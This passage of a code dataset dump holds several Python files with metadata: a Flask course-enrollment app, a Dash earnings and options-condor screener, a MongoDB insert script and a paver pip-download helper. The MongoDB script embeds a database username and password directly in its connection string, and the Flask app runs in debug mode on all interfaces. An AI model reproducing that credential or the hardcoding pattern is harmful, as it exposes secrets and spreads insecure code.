{out_annot_path}')\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "tools/data/youtube-8m/prepare_annot.py", "file_name": "prepare_annot.py", "file_ext": "py", "file_size_in_byte": 6137, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.exists", "line_number": 10, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 28, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 56, "usage_type": "call"}, {"api_name": 
"os.path.isfile", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 70, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 76, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 97, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 133, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 142, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 185, "usage_type": "call"}]} +{"seq_id": "558869849", "text": "import json\n\njson_file=open('week1.json')\ndata=json.load(json_file)\nprint(type(data))\nview={'Monday':{},'Tuesday':{},'Wednesday':{},'Thursday':{},'Friday':{}}\n\nfor p in data:\n temp=0\n for k,v in p[2]['conference-categories-count'].items():\n temp=temp+v\n if p[0]['dow']=='Monday':\n view['Monday'][p[1]['time']]=temp\n elif p[0]['dow']=='Tuesday':\n view['Tuesday'][p[1]['time']] = temp\n elif p[0]['dow']=='Wednesday':\n view['Wednesday'][p[1]['time']] = temp\n elif p[0]['dow']=='Thursday':\n view['Thursday'][p[1]['time']] = temp\n elif p[0]['dow']=='Friday':\n view['Friday'][p[1]['time']] = temp\n\nfor k,v in view.items():\n print(\"{}===>{}\".format(k,v))\n\n\n\n", "sub_path": "ReadJSON.py", "file_name": "ReadJSON.py", "file_ext": "py", "file_size_in_byte": 717, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "516869642", "text": "from flask import Flask, request, render_template, redirect, url_for, flash\nimport dao.connect\nimport threading\nimport csv\nimport re\nimport beans.fach\nimport dao.application_dao\nfrom beans import fach\n\n\napp = Flask(__name__, template_folder='template')\napp.secret_key = b'hdgsJ%82/\"*dbh#'\n\n\ndef csv_reader(path):\n with open(path, \"r\") as csvfile:\n tmp = {}\n reader = csv.reader(csvfile, delimiter='=')\n for line in reader:\n tmp[line[0]] = line[1]\n return tmp\n\nconfig = csv_reader(\"properties.settings\")\n\n\n@app.route(\"//\", methods=['GET', 'POST'])\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index(bid):\n \"\"\"Erste Seite der Webseite: \"\"\"\n user_store = dao.application_dao.ApplicationDao() \n\n meine_kurse = user_store.get_my_courses(bid)\n verf_kurse = user_store.get_all_other_courses(bid)\n\n #result = False\n #if request.method == \"POST\":\n # Form data\n #name = request.form['course_name'] \n #enroll_key = request.form.get('schluessel')\n #free_spots = request.form.get('freie_plaetze') \n #desc = request.form.get('btext')\n \n #print(name, bid, enroll_key, free_spots, desc)\n \n #new_course = fach.Kurs(name, bid, free_spots, desc, enroll_key)\n \n #course_store = dao.application_dao.ApplicationDao()\n\n #course_id = course_store.add_course(new_course) # Muss eine valide kid zurückliefern\n #print(course_id, bid)\n #course_store.completion()\n #course_store.close()\n\n #if course_id is not None: #Wenn course_id nicht NULL ist, ist es valid #TODO\n #with threading.Lock():\n #user_store.einschreiben(bid, course_id, enroll_key) #Add owner to course, Fix\n \n #user_store.completion()\n #user_store.close()\n\n # TODO res=result\n return render_template('index.html', mkurse=meine_kurse, vkurse=verf_kurse, 
bid=bid)\n\n\n@app.route(\"/<bid>/new_course\", methods=['POST', 'GET'])\ndef new_course(bid):\n    return render_template(\"new_course.html\", bid=bid)\n\n\n@app.route(\"/<bid>/view_course\", methods=['POST', 'GET'])\ndef view_course(bid):\n    info_store = dao.application_dao.ApplicationDao()\n    kname = str(request.form.get(\"kname\"))\n    ersteller = str(request.form.get(\"ersteller\"))\n    fp = request.form.get(\"fp\")\n\n    #print(bid)\n\n    #Enrollment key, if present. Used to check whether a submitted key matches\n    reg_key = info_store.get_key(kname, ersteller) \n\n    #course owner\n    owner = info_store.get_course_owner(kname) \n    #print(owner)\n\n    desc = info_store.get_course_details(kname, ersteller)\n\n    # Read details for above data from database \n\n    #course id\n    kid = info_store.get_kid(kname, ersteller)\n\n    #print(ersteller)\n    #print(kid)\n    #print(bid)\n\n    #check registration status. Returns True or False\n    registered = info_store.is_registered(bid, kid)\n\n    #print(bid, kid)\n    #print(registered)\n\n    exercises = None\n\n    #Get exercises for the retrieved kid\n    exercises = info_store.get_ex_list(kid, int(bid))\n\n    # TODO: Different view for ersteller\n\n\n    return render_template(\"view_course.html\", bid=bid, kname=kname, desc=desc, fp=fp, \n    ersteller=ersteller, schluessel=reg_key, owner=owner, exercises=exercises, \n    registered=registered, kid=kid)\n\n\n@app.route('/<bid>/new_enroll', methods=['POST', 'GET'])\ndef new_enroll(bid):\n    kname = request.form.get(\"kname\")\n    ersteller = request.form.get(\"ersteller\")\n\n\n    return render_template('new_enroll.html', bid=bid, kname=kname, ersteller=ersteller)\n\n\n@app.route('/<bid>/new_assignment', methods=['POST', 'GET'])\ndef new_assignment(bid):\n\n    store_submission = dao.application_dao.ApplicationDao()\n    \n    kid = request.form.get('kid')\n\n    anummer = request.form.get('anummer')\n\n    kname = request.form.get('kname')\n\n    ex_name = request.form.get('ex_name')\n\n\n    #TODO: description\n    #desc = store_submission.get_ex_details(kid, anummer)\n\n\n    #print(bid, kid, anummer)\n\n    #Submissions should be done only once: TODO: Is defective\n    #is_duplicate = store_submission.submission_exists(bid, kid, anummer)\n\n    #print(is_duplicate) TODO\n\n    return render_template('new_assignment.html', kname=kname, ex_name=ex_name)\n\n\n@app.route('/onlineLearner', methods=['GET'])\ndef onlineLearn():\n\n    try:\n        dbExists = dao.connect.DBUtil().checkDatabaseExistsExternal()\n        if dbExists:\n            db2exists = 'available! Great!'
\n        else:\n            db2exists = 'not available :-('\n    except Exception as e:\n        print(e)\n\n    return render_template('onlineLearner.html', db2exists=db2exists, db2name=\"onlineLearner\")\n\n\n\n\n\nif __name__ == \"__main__\":\n    port = int(\"9\" + re.match(r\"([a-z]+)([0-9]+)\", config[\"username\"], re.I).groups()[1])\n    app.run(host='0.0.0.0', port=port, debug=True)\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 18, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 30, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 30, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 72, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 72, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 75, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 122, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 128, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 128, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 128, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 134, "usage_type": 
"call"}, {"api_name": "flask.request.form", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 136, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 136, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 136, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 150, "usage_type": "call"}, {"api_name": "dao.connect.connect.DBUtil", "line_number": 157, "usage_type": "call"}, {"api_name": "dao.connect.connect", "line_number": 157, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 157, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 165, "usage_type": "call"}, {"api_name": "re.match", "line_number": 172, "usage_type": "call"}, {"api_name": "re.I", "line_number": 172, "usage_type": "attribute"}]} +{"seq_id": "269776011", "text": "# Import required libraries\nimport os\nimport datetime as dt\n\nimport numpy as np\nimport pandas as pd\nimport plotly.plotly as py\nimport flask\nimport dash\nfrom dash.dependencies import Input, Output, State\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nimport dash_table_experiments as dasht\n\nfrom py_vollib.black_scholes_merton.implied_volatility import *\nfrom py_vollib.black_scholes_merton.greeks.analytical import *\nfrom data_collect import *\n\n\n# Setup app\n# server = flask.Flask(__name__)\n# server.secret_key = os.environ.get('secret_key', 'secret')\n# app = dash.Dash(__name__, server=server, url_base_pathname='/dash/gallery/volatility-surface', csrf_protect=False)\napp = dash.Dash(__name__)\n#server = app.server\n\nexternal_css = [\"https://fonts.googleapis.com/css?family=Overpass:300,300i\",\n \"https://cdn.rawgit.com/plotly/dash-app-stylesheets/dab6f937fd5548cebf4c6dc7e93a10ac438f5efb/dash-technical-charting.css\"]\n\nfor css in external_css:\n app.css.append_css({\"external_url\": css})\n\nif 'DYNO' in os.environ:\n app.scripts.append_script({\n 'external_url': 'https://cdn.rawgit.com/chriddyp/ca0d8f02a1659981a0ea7f013a378bbd/raw/e79f3f789517deec58f41251f7dbb6bee72c44ab/plotly_ga.js'\n })\n \n\ndef generate_table(dataframe):\n return html.Table(\n # Header\n [html.Tr([html.Th(col) for col in dataframe.columns])] +\n\n # Body\n [html.Tr([\n html.Td(dataframe.iloc[i][col]) for col in dataframe.columns\n ]) for i in range(len(dataframe))]\n )\n\n# Make app layout\napp.layout = html.Div(\n [\n html.Div([\n html.Img(\n src=\"http://fchen.info/wp-content/uploads/2016/10/fclogo2.png\",\n className='two columns',\n style={\n 'height': '60',\n 'width': '60',\n 'float': 'left',\n 'position': 'relative',\n },\n ),\n html.H1(\n 'Earnings Screening',\n className='eight columns',\n style={'text-align': 'center'}\n ),\n html.Img(\n src=\"https://s3-us-west-1.amazonaws.com/plotly-tutorials/logo/new-branding/dash-logo-by-plotly-stripe.png\",\n className='two columns',\n style={\n 'height': '60',\n 'width': '135',\n 'float': 'right',\n 'position': 'relative',\n },\n ),\n ],\n className='row'\n ),\n html.Hr(style={'margin': '0', 'margin-bottom': '5'}),\n \n ################# Input for Earnings DF Layout ########################\n html.Div([\n html.H4(\n 'Upcoming Earnings',\n className='twelve columns',\n style={'text-align': 'center'}\n ),\n ],\n className='row',\n style={'margin-bottom': '20'}\n ), \n \n html.Div([\n html.Div([\n html.Label('Starting Date:',\n 
style={'text-align': 'center'}),\n dcc.DatePickerSingle(\n id='startdate',\n date=dt.date.today(),\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='three columns',\n ),\n html.Div([\n html.Label('Days Forward:',\n style={'text-align': 'left'}),\n dcc.Slider(\n id='forward_days',\n marks={i: '{}'.format(i) for i in range(11)},\n min=0,\n max=10,\n step=1,\n value=0\n )\n ],\n className='six columns',\n style={'margin-bottom': '20'}\n ),\n html.Div([\n html.Label('Earnings Query:'),\n html.Button('Submit Earnings Query', id='earnings_query'),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='three columns',\n )\n ],\n className='row',\n style={'margin-bottom': '10'}\n ),\n\t\t\n\t\thtml.Div([\n html.Div([\n html.Label('Max Strike Gap:'),\n dcc.Input(\n id='max_gap',\n type='number',\n value=5\n )\n ], \n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n html.Div([\n html.Label('DTE Threshold:'),\n dcc.Input(\n id='dte_thresh',\n type='number',\n value=5\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n html.Div([\n html.Label('Strike Filter Type:'),\n dcc.Input(\n id='strike_filter',\n type='text',\n value='bounds'\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n \n html.Div([\n html.Label('Moneyness Threshold:'),\n dcc.Input(\n id='money_thresh',\n type='number',\n value=0.1\n )\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n\t\t\thtml.Div([\n html.Label('Strike Adjustment:'),\n dcc.Input(\n id='bounds_adj',\n type='number',\n value=0,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n ],\n className='row',\n style={'margin-bottom': '10'}\n ),\n \n ################# Earnings DF Layout ########################\n html.Div([\n html.Button('Update Earnings Table', id='earnings_show'),\n dasht.DataTable(\n # Initialise the rows\n rows=[{}],\n row_selectable=True,\n filterable=True,\n sortable=True,\n selected_row_indices=[],\n id='e_table'\n ),\n html.Div(id='selected-indexes')\n ],\n className='row',\n style={'margin-bottom': '20',\n 'text-align': 'center'}\n ),\n \n ################# Input for Condors DF Layout ########################\n html.Div([\n html.H4(\n 'Potential Condors',\n className='twelve columns',\n style={'text-align': 'center'}\n ),\n ],\n className='row',\n style={'margin-bottom': '20'}\n ), \n \n \n html.Div([\n html.Div([\n html.Label('Delta Threshold:'),\n dcc.Input(\n id='delta_thresh',\n type='number',\n value=0.03\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n ),\n html.Div([\n html.Label('Minimum Premium:'),\n dcc.Input(\n id='minimum_prem',\n type='number',\n value=0.15,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n ),\n html.Div([\n html.Label('Risk Reward Threshold:'),\n dcc.Input(\n id='rr_thresh',\n type='number',\n value=0.2,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n )\n ],\n 
className='row',\n style={'margin-bottom': '10'}\n ),\n \n ################# Condors DF Layout ########################\n \n html.Div([\n html.Button('Update Condors Table', id='condors_show'),\n dasht.DataTable(\n # Initialise the rows\n rows=[{}],\n row_selectable=True,\n filterable=True,\n sortable=True,\n selected_row_indices=[],\n id='c_table'\n ),\n html.Div(id='selected-indexes')\n ],\n className='row',\n style={'margin-bottom': '20',\n 'text-align': 'center'}\n ), \n \n # Temporary hack for live dataframe caching\n # 'hidden' set to 'loaded' triggers next callback\n html.P(\n hidden='',\n id='raw_container',\n style={'display': 'none'}\n )\n ],\n style={\n 'width': '85%',\n 'max-width': '1200',\n 'margin-left': 'auto',\n 'margin-right': 'auto',\n 'font-family': 'overpass',\n 'background-color': '#FFFFFF',\n 'padding': '40',\n 'padding-top': '20',\n 'padding-bottom': '20',\n },\n)\n\n# Cache raw data\n@app.callback(\n Output('raw_container', 'hidden'),\n [Input('earnings_query', 'n_clicks')],\n [State('startdate','date'),\n State('forward_days','value'),\n State('max_gap','value'),\n State('dte_thresh','value'),\n State('strike_filter','value'),\n State('money_thresh','value'),\n\t\t State('bounds_adj','value')])\ndef cache_earnings(n_clicks, startdate, fwd_days, maxgap, dtethresh,\n strikefilter, moneythresh, boundsadj):\n\n global earnings_df, condors_df\n start_date = dt.datetime.strptime(startdate, '%Y-%m-%d')\n earnings_df = earnings(start_date, fwd_days)\n \n condors_df = condor_screener(earnings_df, max_gap = maxgap, dte_thresh = dtethresh, \n money_thresh = moneythresh, delta_thresh = 0.03, \n minimum_prem = 0.1, bounds_adj = boundsadj, \n rr_thresh = 0.1, strike_filter = strikefilter)\n \n print('Loaded raw data')\n return 'loaded'\n\n\n@app.callback(\n Output('e_table', 'rows'), \n [Input('earnings_show', 'n_clicks')],\n [State('raw_container', 'hidden')])\ndef update_e_table(n_clicks, hidden):\n if hidden == 'loaded':\n return earnings_df.to_dict('records')\n\n@app.callback(\n Output('c_table', 'rows'), \n [Input('condors_show', 'n_clicks')],\n [State('raw_container', 'hidden'),\n\t\t State('delta_thresh','value'),\n State('minimum_prem','value'),\n State('rr_thresh','value')])\ndef update_c_table(n_clicks, hidden, deltathresh, \n minimumprem, rrthresh):\n if hidden == 'loaded':\n filtered_condors = condors_df[(abs(condors_df['Delta']) <= deltathresh) & \n (condors_df['Premium'] >= minimumprem) & \n (condors_df['RiskRewardRatio'] >= rrthresh)]\n return filtered_condors.to_dict('records')\n\nif __name__ == '__main__':\n app.server.run(port=8000, debug=True, threaded=True, use_reloader=False)\n #app.run_server(debug = True)", "sub_path": "Earnings Scanner/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 12657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dash.Dash", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "dash_html_components.Table", "line_number": 41, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 43, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 43, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 46, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 47, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 52, "usage_type": "call"}, 
{"api_name": "dash_html_components.Div", "line_number": 54, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 55, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 65, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 70, "usage_type": "call"}, {"api_name": "dash_html_components.Hr", "line_number": 83, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 86, "usage_type": "call"}, {"api_name": "dash_html_components.H4", "line_number": 87, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 97, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 99, "usage_type": "call"}, {"api_name": "dash_core_components.DatePickerSingle", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 103, "usage_type": "attribute"}, {"api_name": "dash_html_components.Div", "line_number": 111, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 112, "usage_type": "call"}, {"api_name": "dash_core_components.Slider", "line_number": 114, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 126, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 127, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 128, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 140, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 141, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 142, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 154, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 155, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 156, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 167, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 168, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 169, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 181, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 182, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 183, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 194, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 195, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 196, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 213, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 214, "usage_type": "call"}, {"api_name": "dash_table_experiments.DataTable", "line_number": 215, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 224, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 232, "usage_type": "call"}, {"api_name": "dash_html_components.H4", "line_number": 233, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 244, "usage_type": 
"call"}, {"api_name": "dash_html_components.Div", "line_number": 245, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 246, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 247, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 258, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 259, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 260, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 271, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 272, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 273, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 291, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 292, "usage_type": "call"}, {"api_name": "dash_table_experiments.DataTable", "line_number": 293, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 302, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 311, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 345, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 345, "usage_type": "attribute"}, {"api_name": "dash.dependencies.Output", "line_number": 332, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 333, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 334, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 335, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 336, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 337, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 338, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 339, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 340, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 358, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 359, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 360, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 366, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 367, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 368, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 369, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 370, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 371, "usage_type": "call"}]} +{"seq_id": "486986209", "text": "from pymongo import MongoClient\nfrom pprint import pprint\nimport json\n\ndef connection():\n \"\"\"\n This function connect to the MongoDB\n \"\"\"\n client = MongoClient('mongodb+srv://backend:WvtTqCuH3nNkS5SL@holmes.ieany.mongodb.net/')\n db = client.holmes\n\n return db\n\ndef insert():\n new_conecction = connection()\n\n sale = new_conecction.sale\n rent = new_conecction.rent\n\n #Get the JSON document with the Values\n with open(r'.\\json\\property_sale.json') as json_file:\n property_sale = json.load(json_file)\n\n with open(r'.\\json\\property_rent.json') as json_file:\n property_rent = json.load(json_file)\n\n #Insert objects into 
MongoDB\n try:\n #Delete the Mongo documents, just for Test purpose\n \"\"\" print('Cleaning the BD...')\n sale.delete_many({})\n rent.delete_many({}) \"\"\"\n\n #Insert new Values\n print('Inserting new values...')\n result = sale.insert_many(property_sale)\n print('Property for sale were successfully inserted in DB')\n\n result = rent.insert_many(property_rent)\n print('Property for rent were successfully inserted in DB')\n\n except NameError:\n print(f'No objects were inserted {NameError}')\n\ndef insert_cities(json):\n new_conecction = connection()\n\n cities = new_conecction.cities\n\n try:\n #Delete the Mongo documents, just for Test purpose\n print('Cleaning the BD...')\n cities.delete_many({})\n\n print('Inserting Cities')\n cities.insert_many(json)\n\n print('Cities were successfully inserted in DB')\n\n except NameError:\n print(f'No objects were inserted {NameError}')\n\nif __name__ == \"__main__\":\n insert()", "sub_path": "backend/ds/scraper/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 1702, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pymongo.MongoClient", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "363609930", "text": "# -*- coding: utf-8 -*-\n# ============================================================================\n# PAVER EXTENSION: Download dependencies with pip via requirements files\n# ============================================================================\n\"\"\"\nA paver extension that provides pip related tasks:\n - download dependent packages\n - build a local packages index for downloaded packages\n\nEXPECTED OPTIONS STRUCTURE:\n options.develop\n .requirements_files -- List of requirements files to use.\n .download_dir -- Directory for downloaded packages.\n\nREQUIRES:\n * paver >= 1.0.4\n * pip >= 1.1\n * pip2pi > 0.1.1 (for localpi)\n\nSEE ALSO:\n * http://www.blueskyonmars.com/projects/paver/\n * http://pypi.python.org/pypi/Paver/\n * http://pypi.python.org/pypi/pip/\n * http://pypi.python.org/pypi/pip2pi/\n\"\"\"\n\nfrom paver.easy import info, options, path, sh, task, call_task\n\n# ----------------------------------------------------------------------------\n# TASKS:\n# ----------------------------------------------------------------------------\n@task\ndef download_depends():\n \"\"\"Download all dependencies (python packages) with pip.\"\"\"\n download_dir = options.develop.download_dir\n info(\"DOWNLOAD ALL DEPENDENCIES: {0}/\".format(download_dir))\n pip_download(download_dir,\n requirements_files=options.develop.requirements_files)\n\n@task\ndef localpi():\n \"\"\"Make local package index (used by tox).\"\"\"\n download_dir = path(options.develop.download_dir)\n if not download_dir.exists():\n call_task(\"download_depends\")\n info(\"MAKE LOCAL PACKAGE-INDEX: {0}/\".format(download_dir))\n sh(\"dir2pi {download_dir}\".format(download_dir=download_dir))\n # -- ALTERNATIVE:\n # for reqs in requirement_files:\n # sh(\"pip2pi downloads -r {requirements}\".format(requirements=reqs))\n\n# ----------------------------------------------------------------------------\n# UTILS:\n# ----------------------------------------------------------------------------\ndef pip_download(download_dir, cmdopts=\"\", requirements_files=None):\n \"\"\"Download all dependencies with pip by using requirement files, 
etc.\"\"\"\n if not cmdopts and not requirements_files:\n assert False, \"Neither requirement_files nor cmdopts provided.\"\n\n # -- NORMAL-CASE:\n # NOTE: --exists-action option requires pip >= 1.1\n download_dir = path(download_dir)\n download_dir.makedirs()\n pip_download_cmd = \"pip install --no-install --exists-action=i\"\n pip_download_cmd += \" --download={0}\".format(download_dir)\n\n if requirements_files:\n # -- WITH REQUIREMENT FILES:\n for requirements_file in requirements_files:\n sh(\"{pip_download} {cmdopts} -r {requirements_file}\"\\\n .format(pip_download=pip_download_cmd, cmdopts=cmdopts,\n requirements_file=requirements_file))\n else:\n # -- NO REQUIREMENT FILES: Requirement in cmdopts, ala: argparse>=1.2\n assert cmdopts\n sh(\"{pip_download} {cmdopts}\".format(\n pip_download=pip_download_cmd, cmdopts=cmdopts))\n", "sub_path": "paver_ext/pip_download.py", "file_name": "pip_download.py", "file_ext": "py", "file_size_in_byte": 3100, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "paver.easy.options.develop", "line_number": 35, "usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 35, "usage_type": "name"}, 